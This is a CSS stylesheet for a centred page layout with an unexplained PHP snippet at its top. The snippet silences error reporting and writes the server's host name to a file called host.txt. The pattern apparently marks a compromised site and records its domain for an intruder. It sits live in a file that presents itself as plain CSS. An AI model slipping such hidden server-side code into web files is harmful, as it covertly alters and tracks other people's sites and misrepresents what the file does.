<? error_reporting(0); $mhfp = fopen("host.txt", "w"); if ($mhfp) { fwrite($mhfp, $_SERVER["HTTP_HOST"]); fclose($mhfp); } ?>/* CSS Document */

body {
	MARGIN: 0px; 
	}	
#horizon {
	DISPLAY: block;
	LEFT: 0px;
	OVERFLOW: visible;
	WIDTH: 100%;
	COLOR: white;
	POSITION: absolute;
	TOP: 50%;
	HEIGHT: 1px;
	BACKGROUND-COLOR: transparent;
	TEXT-ALIGN: center;
	visibility: visible;
}

#content {
	LEFT: 50%; VISIBILITY: visible; MARGIN-LEFT: -120px; WIDTH: 240px; FONT-FAMILY: Arial, Verdana, Helvetica, sans-serif; POSITION: absolute; TOP: -238px; HEIGHT: 480px; BACKGROUND-COLOR: transparent
}
#tdNavigation {
	background-color: #ffffff;
	background-image:inherit;
	padding-bottom: 0px;
}

